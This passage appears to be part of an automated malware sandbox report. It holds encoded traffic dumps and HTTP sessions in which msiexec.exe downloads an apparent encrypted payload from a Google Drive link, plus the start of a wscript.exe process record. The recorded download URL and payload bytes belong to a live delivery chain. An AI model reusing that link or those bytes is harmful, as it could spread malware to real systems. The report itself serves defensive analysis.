                                                                                        2025-03-12 18:15:21 UTC1378INData Raw: 77 51 6c 32 4a 62 52 70 75 79 53 6b 39 31 49 35 78 39 53 73 6f 46 79 35 4b 33 2b 6a 55 34 48 64 39 76 55 36 57 2f 76 6c 79 73 42 76 42 42 4b 33 30 66 79 2f 4d 6d 52 76 6f 71 59 49 46 2f 63 4a 45 38 49 2b 75 4b 67 59 67 58 74 6f 58 50 34 37 61 46 7a 2b 4f 32 68 63 2f 6a 74 6f 58 50 34 37 61 46 7a 2b 4f 32 68 53 65 4d 51 47 38 73 4e 4c 33 43 42 53 6b 53 78 46 71 2f 43 38 38 6d 4f 71 56 50 66 65 52 2b 34 4f 34 41 6a 49 4c 48 36 57 38 6d 55 65 53 2f 51 65 2f 5a 62 4b 47 46 58 6c 4a 30 61 58 78 7a 75 74 62 36 37 76 63 64 77 34 74 47 38 76 50 49 52 72 65 56 6f 68 33 76 30 43 48 55 30 36 4c 66 4a 72 79 6b 36 75 76 4c 4d 79 58 6a 31 67 6d 49 67 52 39 7a 42 70 69 37 44 49 54 68 49 48 79 77 63 6e 42 74 50 71 6d 37 6f 76 5a 4a 6c 74 48 65 73 50 79 56 53 69 61 36 4c
                                                                                        Data Ascii: wQl2JbRpuySk91I5x9SsoFy5K3+jU4Hd9vU6W/vlysBvBBK30fy/MmRvoqYIF/cJE8I+uKgYgXtoXP47aFz+O2hc/jtoXP47aFz+O2hSeMQG8sNL3CBSkSxFq/C88mOqVPfeR+4O4AjILH6W8mUeS/Qe/ZbKGFXlJ0aXxzutb67vcdw4tG8vPIRreVoh3v0CHU06LfJryk6uvLMyXj1gmIgR9zBpi7DIThIHywcnBtPqm7ovZJltHesPyVSia6L
                                                                                        2025-03-12 18:15:21 UTC1378INData Raw: 41 44 67 6e 57 44 48 62 34 4a 4c 47 6a 61 56 30 71 63 57 6a 51 63 66 6a 74 4b 4a 4d 30 2f 64 57 33 6c 35 52 5a 6d 66 77 70 54 61 7a 6a 78 61 62 43 61 2b 57 4c 37 32 56 48 79 61 78 4f 64 4a 66 61 78 4d 75 49 57 39 48 32 38 6c 43 77 76 66 44 4b 74 51 4f 43 42 48 6b 73 65 52 66 48 44 53 43 79 49 30 41 39 32 36 70 78 4b 4a 48 35 35 7a 7a 32 44 35 69 35 31 31 71 38 61 51 36 72 35 30 57 68 32 74 52 70 52 68 6b 6d 45 37 57 72 7a 54 36 67 52 53 7a 63 55 4f 4a 6b 61 67 35 6a 6a 79 34 79 6a 75 4d 36 36 45 53 58 30 44 68 6c 33 6e 75 4f 55 74 56 47 4b 5a 35 6f 61 53 70 7a 61 4e 42 78 2b 4f 30 6f 7a 6e 54 73 6f 58 50 33 37 4c 63 76 2b 4f 32 68 63 2f 6a 74 6f 58 50 34 37 61 46 7a 2b 4f 32 68 63 2f 6a 74 6f 58 50 34 37 5a 4a 6c 61 43 46 32 4a 6e 45 79 39 76 68 46 59 61
                                                                                        Data Ascii: ADgnWDHb4JLGjaV0qcWjQcfjtKJM0/dW3l5RZmfwpTazjxabCa+WL72VHyaxOdJfaxMuIW9H28lCwvfDKtQOCBHkseRfHDSCyI0A926pxKJH55zz2D5i511q8aQ6r50Wh2tRpRhkmE7WrzT6gRSzcUOJkag5jjy4yjuM66ESX0Dhl3nuOUtVGKZ5oaSpzaNBx+O0oznTsoXP37Lcv+O2hc/jtoXP47aFz+O2hc/jtoXP47ZJlaCF2JnEy9vhFYa
                                                                                        2025-03-12 18:15:21 UTC1378INData Raw: 66 36 75 2f 50 6e 70 70 48 4f 6a 74 79 47 4b 6f 4c 4a 65 35 6d 44 74 6f 58 4f 70 56 4d 32 69 43 77 6b 67 73 76 2b 65 54 4b 31 35 48 48 62 4a 72 48 63 67 67 76 59 46 67 4c 4e 35 42 4a 45 59 61 33 51 6f 53 76 6a 32 37 5a 4f 6e 4d 77 6e 6e 4e 74 32 59 77 4a 72 51 73 52 30 41 31 41 4f 77 76 34 6e 36 61 66 59 46 53 79 6f 51 42 31 75 4d 42 32 62 74 56 2f 42 6d 6f 44 4e 78 37 50 50 4a 4c 66 4e 2b 5a 58 6b 48 77 42 4f 45 42 69 43 78 55 66 4d 2f 70 33 48 58 65 4b 4b 68 46 69 46 6e 77 42 49 59 73 53 70 6d 77 6c 74 41 38 6d 4b 52 69 52 71 4c 67 66 57 39 6d 43 52 30 42 50 56 6b 54 41 31 77 68 48 56 35 56 64 38 4f 4d 76 76 4c 6b 6e 48 51 35 73 30 46 44 37 69 36 49 52 74 71 6d 4f 37 43 64 6c 4f 49 51 56 42 49 73 63 68 2f 32 42 33 31 42 65 73 5a 57 72 50 78 53 74 52 43
                                                                                        Data Ascii: f6u/PnppHOjtyGKoLJe5mDtoXOpVM2iCwkgsv+eTK15HHbJrHcggvYFgLN5BJEYa3QoSvj27ZOnMwnnNt2YwJrQsR0A1AOwv4n6afYFSyoQB1uMB2btV/BmoDNx7PPJLfN+ZXkHwBOEBiCxUfM/p3HXeKKhFiFnwBIYsSpmwltA8mKRiRqLgfW9mCR0BPVkTA1whHV5Vd8OMvvLknHQ5s0FD7i6IRtqmO7CdlOIQVBIsch/2B31BesZWrPxStRC
                                                                                        2025-03-12 18:15:21 UTC1378INData Raw: 46 6d 76 50 4b 6f 52 76 54 4f 67 45 71 71 56 52 59 63 58 2f 70 49 49 4b 78 58 43 36 66 65 52 79 4d 39 30 74 6b 49 4a 71 57 44 65 6b 63 65 52 79 4f 4a 59 6f 66 38 2b 39 78 44 36 68 35 5a 64 52 2b 41 4f 4d 5a 72 77 77 78 7a 6e 57 34 63 36 62 49 49 62 66 76 38 6c 47 69 7a 59 75 42 36 37 64 69 54 41 72 54 64 7a 5a 39 32 69 66 55 7a 63 35 34 41 4b 52 66 57 65 6b 5a 59 73 63 4d 65 52 53 58 77 71 61 69 2b 34 51 2b 75 56 71 50 79 4c 51 67 52 39 79 34 68 47 7a 52 75 68 34 50 50 71 34 34 38 67 39 71 6d 31 59 2f 62 46 61 2b 33 7a 71 41 38 67 2f 34 74 50 46 46 62 45 34 47 7a 74 35 6a 2b 75 38 56 79 57 5a 65 79 6d 38 50 50 53 72 62 63 6e 51 77 6b 51 41 45 41 71 75 76 47 69 58 75 30 76 2f 56 64 69 61 56 47 69 62 77 5a 42 34 58 41 57 54 64 47 74 37 62 32 2f 34 6b 52 78
                                                                                        Data Ascii: FmvPKoRvTOgEqqVRYcX/pIIKxXC6feRyM90tkIJqWDekceRyOJYof8+9xD6h5ZdR+AOMZrwwxznW4c6bIIbfv8lGizYuB67diTArTdzZ92ifUzc54AKRfWekZYscMeRSXwqai+4Q+uVqPyLQgR9y4hGzRuh4PPq448g9qm1Y/bFa+3zqA8g/4tPFFbE4Gzt5j+u8VyWZeym8PPSrbcnQwkQAEAquvGiXu0v/VdiaVGibwZB4XAWTdGt7b2/4kRx
                                                                                        2025-03-12 18:15:21 UTC1378INData Raw: 38 43 68 6f 66 45 4e 61 4b 2f 6d 65 55 5a 43 79 78 65 45 34 37 47 57 61 57 73 72 6e 6b 53 44 43 36 5a 73 54 33 50 6f 37 61 45 62 4a 5a 74 6c 47 33 6e 70 68 54 78 6f 39 58 33 79 7a 4d 6d 58 63 4e 64 70 72 72 54 4f 45 36 46 7a 2b 4f 32 68 63 2f 6a 74 6f 58 50 34 37 61 46 7a 2b 4f 32 68 63 2f 6a 74 6f 58 50 44 52 69 47 6a 4d 37 68 78 6e 58 38 2f 78 44 58 6b 6f 43 42 33 33 41 64 61 66 73 64 6b 50 4a 48 35 37 61 45 67 51 32 44 56 4d 36 39 73 55 75 32 38 47 79 44 79 43 32 39 78 31 49 6c 73 59 6a 59 43 36 4a 33 79 45 34 2f 73 5a 42 74 6b 73 71 57 63 59 4d 61 4d 77 4a 2b 68 7a 62 6d 2f 72 65 36 39 71 35 4a 5a 4f 38 76 52 76 5a 36 6d 58 6c 4b 66 32 66 30 50 46 48 73 6c 33 55 77 74 2f 4b 46 4f 4f 55 4c 4f 6d 56 70 73 35 4b 6c 4a 36 79 68 44 34 39 58 2b 34 2b 4b 68
                                                                                        Data Ascii: 8ChofENaK/meUZCyxeE47GWaWsrnkSDC6ZsT3Po7aEbJZtlG3nphTxo9X3yzMmXcNdprrTOE6Fz+O2hc/jtoXP47aFz+O2hc/jtoXPDRiGjM7hxnX8/xDXkoCB33AdafsdkPJH57aEgQ2DVM69sUu28GyDyC29x1IlsYjYC6J3yE4/sZBtksqWcYMaMwJ+hzbm/re69q5JZO8vRvZ6mXlKf2f0PFHsl3Uwt/KFOOULOmVps5KlJ6yhD49X+4+Kh


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.749696216.58.206.464431100C:\Windows\SysWOW64\msiexec.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-12 18:16:36 UTC216OUTGET /uc?export=download&id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                        Host: drive.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2025-03-12 18:16:37 UTC1610INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Wed, 12 Mar 2025 18:16:36 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'nonce-iFIDDJLhl5k5j8FOjPTzag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.749697172.217.18.14431100C:\Windows\SysWOW64\msiexec.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-12 18:16:39 UTC258OUTGET /download?id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX&export=download HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        2025-03-12 18:16:42 UTC5012INHTTP/1.1 200 OK
                                                                                        X-GUploader-UploadID: AKDAyIuDtYw27_ygJX4VQIhfC27DTm_4EpdxzY8BC5p15NSx-FL_jTj7r_UXthX_h3WQZ7Yu
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Security-Policy: sandbox
                                                                                        Content-Security-Policy: default-src 'none'
                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                        X-Content-Security-Policy: sandbox
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Content-Disposition: attachment; filename="aQSVkjgtm168.bin"
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Credentials: false
                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 498752
                                                                                        Last-Modified: Tue, 11 Mar 2025 07:32:37 GMT
                                                                                        Date: Wed, 12 Mar 2025 18:16:41 GMT
                                                                                        Expires: Wed, 12 Mar 2025 18:16:41 GMT
                                                                                        Cache-Control: private, max-age=0
                                                                                        X-Goog-Hash: crc32c=fhuExg==
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close
                                                                                        2025-03-12 18:16:42 UTC5012INData Raw: 59 15 97 0a 2e 63 24 15 7f 63 af eb 4f f5 1b 48 3c ab b0 76 ec 38 60 dd 13 28 58 16 b0 b9 90 d5 be 64 bd 99 67 2b 30 0e 04 d0 ff e3 d5 97 12 ff fb 0b 48 a4 67 1d ed ce ee 5a a9 be 4d b9 a5 7d ee 76 87 4c 72 bb 36 f2 61 4b 97 65 12 eb 73 26 a3 ac 17 cd 21 89 c8 55 c0 6e f7 ae e4 8c 86 05 74 dd 96 c5 5f 60 ce b4 8d 6e ad e5 b0 65 15 39 e7 f9 8b c6 6f 64 15 12 07 87 ff bf e2 e9 5e af 2d 70 47 e5 af 85 14 d7 fb 83 5c 12 b3 df 7b 50 db 5f 15 03 9b 10 49 02 33 03 c6 50 ae 05 dd bb 97 7c cd 09 6b 77 ad c3 32 22 ce 73 43 ea 86 8e ca 0b f8 a3 52 12 56 ad ba 4f 24 7c e1 43 11 b5 a8 b9 4e 94 a0 64 62 df d7 f3 44 b1 36 4e c1 95 da c0 7b 49 5b 99 3d 57 17 39 11 52 1f 27 9f 4f eb 88 16 22 5b d9 ff 65 0a 68 2d c9 c2 c7 d5 8e 66 a6 54 74 44 fd 8a e4 eb 50 c8 8a 63 20 2e
                                                                                        Data Ascii: Y.c$cOH<v8`(Xdg+0HgZM}vLr6aKes&!Unt_`ne9od^-pG\{P_I3P|kw2"sCRVO$|CNdbD6N{I[=W9R'O"[eh-fTtDPc .
                                                                                        2025-03-12 18:16:42 UTC4676INData Raw: 7a 78 73 5e 90 72 d6 7a 31 49 15 8f 29 ec 8d 78 d0 a4 91 0f 1b 2a c4 28 ae a8 7a 6f 23 63 91 e6 bf 67 ce e6 48 b4 bb 32 9f 28 de 3a 6d 9b b6 c4 b1 20 ca 61 4e 0b 05 a2 25 49 18 28 ea 49 85 b3 bf 36 a4 ee ba 7f 1b ec 14 73 ad d5 44 85 cf 21 89 37 21 a4 66 7c 60 0c 0d 85 05 74 56 50 9b 9d 64 ce e2 06 9f 45 bb b1 65 15 b2 29 11 f9 c4 6f 64 ea 66 23 8b 74 71 15 9c 7a a3 cb ee fe eb af ba db 44 18 33 5d 08 f5 0f c7 02 b3 2c 35 f8 27 97 60 72 52 6e 6d f5 91 a8 e6 5f 0f 0d f9 e7 ba 8e 95 a5 fa 50 a1 53 07 f5 58 eb 58 34 74 3e 89 e0 a4 fe c7 1f af b2 09 67 18 b5 e4 2c f3 f9 23 a1 2c fe da f8 e2 0c f8 1b ae 61 62 57 c4 8e 40 92 9b e2 6b aa 87 8d 54 2c 39 79 3f c3 30 52 4d 3a 50 65 08 1b c3 ac 9c 47 8a 50 17 f2 ca bd c5 2e af e9 b1 47 5b eb bd fa 77 68 c8 23 5f 3f
                                                                                        Data Ascii: zxs^rz1I)x*(zo#cgH2(:m aN%I(I6sD!7!f|`tVPdEe)odf#tqzD3],5'`rRnm_PSXX4t>g,#,abW@kT,9y?0RM:PeGP.G[wh#_?
                                                                                        2025-03-12 18:16:42 UTC1378INData Raw: 8b 83 73 46 1a 64 ce 19 15 ca bb 7f c2 9f 84 80 e9 43 4e ca 4a 64 c8 9e cc 43 5b 39 41 40 8f 79 fd 77 e7 73 ba e2 75 d7 82 11 97 8e 05 61 11 db 29 bc ee 68 37 6e 5f cc 75 58 ae 49 79 7a 19 cc cb 3b d5 ce 9e 57 2a 92 37 5a cc f6 86 74 0c 2c 8a 7e c9 9d 0e 27 2e a7 3d 10 de 62 85 e9 e8 d7 9f c0 1d ce 7e 07 53 b7 87 70 09 4d 31 6b f8 61 f1 50 a6 1c 25 da 60 71 19 56 2e b2 79 11 ec 52 99 62 2e 99 af 7f 65 24 37 a0 3d 6d df 18 ce 34 e2 a6 84 98 6a 3e 10 20 1e 23 29 14 c3 54 0e a1 e4 65 c9 d4 dc 79 73 d9 e4 1f cf 45 3b 7e 3e b1 43 90 9b 6d e3 75 50 76 9a a3 82 96 79 02 61 8f 33 b2 df d1 62 8d d9 ce ca f2 2c b6 fd e4 d8 f6 f6 74 9e 5f 2a 43 43 d3 52 07 ee 46 79 c9 cd 73 cf ec b4 00 d0 7c 92 63 5a 16 12 9a b3 2d 18 3f 95 34 29 6d ea 26 e0 e5 d2 bf 0e e5 5f 7d fa
                                                                                        Data Ascii: sFdCNJdC[9A@ywsua)h7n_uXIyz;W*7Zt,~'.=b~SpM1kaP%`qV.yRb.e$7=m4j> #)TeysE;~>CmuPvya3b,t_*CCRFys|cZ-?4)m&_}
                                                                                        2025-03-12 18:16:42 UTC1378INData Raw: 18 d6 9d 15 10 29 28 a4 5a e3 aa e8 9a 36 a1 7a 79 23 cc 6b 71 5b 44 c0 65 63 24 0e ce ec 9b 9d 63 65 86 7a 1f 38 12 40 6a a1 77 5d b7 02 f9 d6 99 cf 38 3f b6 b8 5b 87 a5 77 6a 51 d6 94 8d ad 87 95 12 62 d4 6e b4 7b 5f 1a a0 c0 16 17 bf 06 bb 74 41 17 44 4a 27 44 49 86 43 63 05 46 fb e2 3d 5e fe 43 2f 9b e8 81 05 51 ff c0 26 65 61 27 3f b8 35 76 a1 3a 0e 0a 4f 8c bd 74 93 00 a6 9d af 4c e4 dc d5 58 80 9d 4f f6 2d af ed fa 70 14 d3 02 c8 bb 0e 48 07 95 1b 04 de b5 db 07 53 95 e5 82 53 d7 65 8a 96 38 d1 1d 73 f6 c7 b4 61 2f d0 80 54 fa 23 07 f8 35 1f 79 31 ac d1 73 89 25 cb c9 04 1b 90 c3 27 d4 f5 e4 25 4c 60 60 ff 89 67 51 4e 4f b6 a2 54 e2 8f 67 ac 9e 5e 58 c8 ea 54 33 ea f9 57 43 ac 1f 88 7c 92 c0 01 b8 83 2f 62 d5 cf 03 02 33 04 83 63 1f 07 78 28 f4 31
                                                                                        Data Ascii: )(Z6zy#kq[Dec$cez8@jw]8?[wjQbn{_tADJ'DICcF=^C/Q&ea'?5v:OtLXO-pHSSe8sa/T#5y1s%'%L``gQNOTg^XT3WC|/b3cx(1
                                                                                        2025-03-12 18:16:43 UTC1378INData Raw: 70 d1 1d 82 14 1b fa 03 a6 68 c0 a7 cd cf 9a 71 20 93 47 4f 8d 39 b1 1c 01 78 be 4e 42 18 64 7b b9 a5 b3 00 6b 0e 35 17 94 7b a7 8a f0 34 6d 2a ed 83 91 8f 66 7a 6c c0 e8 64 d4 e6 13 f0 88 eb 24 ba 0f e1 dc 9f 6d e7 ca 91 7a 3e 17 32 19 4d 2a 23 40 ec b9 73 93 91 02 fe 8e ad c8 4c e5 cd 26 3b 69 f4 4a 92 3f 65 9b a2 a2 3d 93 75 fd d7 70 a8 62 81 c0 ca a9 8a cc 9e 2b 0a 2e cb 4b c4 52 0c e0 68 ec ef dd 28 4c d5 55 03 6c 74 54 b7 14 0d 5d 27 56 23 14 7a e0 df 4e 6f 7f 39 0e fc 3f ee 5b 8b 45 d2 5c d9 7a 63 4a a6 c3 88 6c 86 fc 8e d4 fe a4 12 9b fa fc 41 83 56 f0 25 c9 d7 fa 77 ff d4 7c 78 d5 76 4c 91 19 99 ab 86 cf 15 3f 81 d8 a3 79 b8 ad fb a7 6d 96 71 02 55 fd 9a a2 d2 b3 5a bb a7 45 5b 4a 36 97 8d 49 73 ab 40 49 06 15 b0 e3 fe 67 c8 21 46 38 88 c9 8f 6b
                                                                                        Data Ascii: phq GO9xNBd{k5{4m*fzld$mz>2M*#@sL&;iJ?e=upb+.KRh(LUltT]'V#zNo9?[E\zcJlAV%w|xvL?ymqUZE[J6Is@Ig!F8k
                                                                                        2025-03-12 18:16:43 UTC1378INData Raw: 40 74 e2 6a b3 8c e3 cc d4 cc fe 69 4a dc ec a4 20 42 c5 c9 41 c8 96 e1 30 bb 2b cf ac 61 48 fe 9c ff 46 39 38 0e 0c dd 9c 3e e0 f0 b3 e6 33 aa 00 af 03 d0 88 fa cc f8 76 73 c2 b6 47 b9 b3 fd 71 24 76 da 15 ef fd 79 bc 4d 7c 5f ca 04 7a fa 22 66 a3 29 6c b9 7a d4 32 ab a0 d6 e0 c1 55 3a 81 a6 dc 8e 2c 2a 8f 65 82 05 e5 1b 1b 63 e8 17 a6 80 15 69 6f 32 d8 2e 95 79 84 72 2b 6f a1 2a 40 2c 32 c3 b2 6f 8d 5f 5f dc ec 97 6c 07 40 b1 c8 f4 9d 3c e2 95 56 f6 51 de 23 e1 08 8f f8 24 f8 c0 74 8d ca 1e aa 55 8a e2 df 86 0d b5 77 b2 fd 7d 54 0c 2d 21 d5 1b ee ea f1 3f f6 d3 37 6b 9a e5 fb 55 82 22 85 41 94 0e f7 72 86 32 19 73 1a 4b 22 ac 24 82 a4 65 3b d2 db f0 a5 50 bc f4 fa 42 b3 77 67 6a 05 a2 89 64 44 8a b7 ce 27 ac 8f 4b f9 7d c6 06 89 7a 67 c2 e7 7a 90 b3 97
                                                                                        Data Ascii: @tjiJ BA0+aHF98>3vsGq$vyM|_z"f)lz2U:,*ecio2.yr+o*@,2o__l@<VQ#$tUw}T-!?7kU"Ar2sK"$e;PBwgjdD'K}zgz
                                                                                        2025-03-12 18:16:43 UTC1378INData Raw: 8a 58 4b 58 4e 15 80 cc 80 3a bc ee 8e 0c a5 94 7a 67 dc c5 01 30 23 1d 78 b5 88 4c 6b ef 19 74 94 42 a0 40 e5 70 a1 c1 bc bc 2c 39 13 a8 e0 36 30 15 5f 1d 77 33 90 c0 af 23 f6 87 47 0f 5d b8 0e 6a ea c4 65 66 cc 94 30 19 0f b8 7f 9e 7f 50 3f 2c 67 96 8c 8c 33 12 c0 c2 b5 fd 5d 85 ba d6 58 a4 a7 b3 55 71 42 4a 64 dc 1a 57 99 43 b8 2d 17 91 26 3c 20 64 d4 f1 db da 31 df 4d 9f 52 27 a1 ff 4e 70 0d 32 ae 17 2a 6d 74 e9 3c 81 26 0c 2d 1d ef 73 92 d5 81 94 53 0e 73 59 8c 7b 79 0c 79 37 1a f9 e1 2f 8c 6e 24 e1 91 a5 bc ec 9e cd a9 42 f8 14 fa 50 64 df 91 18 f2 81 f9 29 fd 5d 1c 06 64 db 40 1b 2e 7c c8 8d 94 25 54 3a 6b 47 0b 82 52 85 b3 e7 e1 34 63 85 92 8c 39 b3 b8 c4 a6 16 06 37 65 95 2e ed fd c8 ad 6b 77 ca d7 c9 64 d7 15 61 9a 8d 44 be 1c 19 3a 1f d6 3a 18
                                                                                        Data Ascii: XKXN:zg0#xLktB@p,960_w3#G]jef0P?,g3]XUqBJdWC-&< d1MR'Np2*mt<&-sSsY{yy7/n$BPd)]d@.|%T:kGR4c97e.kwdaD::
                                                                                        2025-03-12 18:16:43 UTC1378INData Raw: 51 1f 38 4d d5 9d 1f 9b bf a8 7d 8c b4 ac 8c 08 33 36 9b 32 de fc f1 1f b1 54 6e 25 a2 ae eb 93 a8 41 ff c2 d8 2f 1b 0c 65 51 83 e1 b6 73 1e 45 66 8a 62 b2 a3 2c 1a e6 56 7e 62 ae d5 70 20 4d bf 82 d0 c5 13 14 a1 83 14 0e 99 62 89 5e 12 ba dc 41 53 29 31 9b 00 ec b6 37 16 9a 92 ed 5c 5f a3 e4 da 97 a4 a2 fd aa 91 80 17 23 03 f7 0f 25 1b de 1a c0 2b 2f b0 b1 5a c0 cf a0 5e 9f e0 c7 2e 29 6f 6d df ad 5a 6e 84 8d 9c 97 8d 07 00 a8 c5 23 74 91 9b 64 98 31 77 e5 e3 73 32 15 8d aa 03 41 63 45 c2 a6 23 46 ce 3a c6 1d a9 cb 83 d0 5c d3 4e 1c fa 70 de 99 84 b4 68 32 66 df 9b c0 1b ac 17 32 55 ad d8 de 4b 86 1f 4f 1b 73 d9 5b ff 1e cd 06 0e 31 9b e3 06 97 45 88 65 9a ea b2 8b dd 9f fd 87 6b 92 81 07 87 ff ec bc 63 91 47 82 bc 02 14 24 e9 96 d5 8f b0 1e 4a f7 ba 0b
                                                                                        Data Ascii: Q8M}362Tn%A/eQsEfb,V~bp Mb^AS)17\_#%+/Z^.)omZn#td1ws2AcE#F:\Nph2f2UKOs[1EekcG$J
                                                                                        2025-03-12 18:16:43 UTC1378INData Raw: 45 69 55 4f 54 72 4d db 04 32 de ff 61 8a 21 69 28 47 df 94 cd 9e 83 00 08 c2 ee b4 a3 c5 51 6a 76 46 ca bc ff 04 e4 b7 84 82 da 68 fa ce 0e 0b 54 e1 09 b7 18 30 31 a2 91 b1 90 2a 87 42 70 cd 57 18 8f 10 1c 07 f9 aa f0 ed 6f e1 c0 47 7c d1 4d 10 59 d3 d1 d2 04 57 a9 89 49 59 be d2 bd 75 c2 16 0e b8 ae a0 ec e0 24 a5 bd 04 0c 5b f2 9e 6b ec db 05 fe e9 be 3c 7a 71 50 7a 1e d6 43 9c 7c ac f0 3a f1 b6 2a 55 8d c5 8a 17 7d 10 b4 dd c6 ee e0 06 04 95 67 b0 65 d7 25 5f f2 12 1d da 3b 78 b4 62 9f d4 32 31 16 8a 9d 05 18 d6 d6 96 39 8b e8 68 f0 87 f4 ca db bb 24 ec b9 08 30 a6 2b 64 0f 00 49 59 3e 8c 96 e7 27 be a4 11 eb 96 9c 8b fb cf db f1 77 75 51 f0 15 9b bf a6 82 6b 61 42 08 c3 1f 0f 31 a4 41 97 e4 0f 5b aa 7a 14 f2 2b 86 88 d2 6c 0b f8 5a 98 79 6e c3 52 7f
                                                                                        Data Ascii: EiUOTrM2a!i(GQjvFhT01*BpWoG|MYWIYu$[k<zqPzC|:*U}ge%_;xb219h$0+dIY>'wuQkaB1A[z+lZynR
                                                                                        2025-03-12 18:16:43 UTC1378INData Raw: e6 fd 9b c3 38 cc 9f 19 fb 8d 21 af 0c 5a cf 34 89 f0 b6 21 67 87 97 9b 43 f7 dd af 61 f2 46 ec 6c 98 19 32 1f 8e 4b 62 08 25 2b fa 03 b6 d2 a3 43 e4 c1 5b e3 c3 eb de 42 e0 17 6b d6 9b 56 76 3a a5 af 45 96 11 8d e5 09 2b af 39 30 d4 d6 fe 96 cb be 85 20 ff 04 ac be 13 aa 74 ad 6e e3 d3 aa 8f d0 08 d7 a2 c5 ae 11 2f 6a 45 11 77 8d a7 39 a3 d3 2f d1 0b fa 16 e3 f1 11 ae d6 a4 7e e8 3c 46 c3 d6 4b 2e 87 d1 e5 3a 01 70 4a c8 19 df 02 d4 ff 89 d4 b3 a2 03 c8 fc b8 6d 05 9f d7 30 16 21 d8 02 b8 7e 90 64 43 12 91 01 05 2a 19 e0 64 3b 18 93 20 05 2b 7d eb 8e 55 15 03 13 14 2b 57 d7 4a 4c 80 f1 9e 71 d5 1d a9 a6 d1 af 40 4b c3 aa 67 70 93 94 d2 3d 24 5e aa 4c 40 0e 18 04 30 b7 5f 71 d9 a0 df ae b1 94 c8 57 2e 5a ac ac d2 17 39 3f 44 1d e7 e5 5a d0 de a1 ae 55 52
                                                                                        Data Ascii: 8!Z4!gCaFl2Kb%+C[BkVv:E+90 tn/jEw9/~<FK.:pJm0!~dC*d; +}U+WJLq@Kgp=$^L@0_qW.Z9?DZUR


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:14:14:45
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
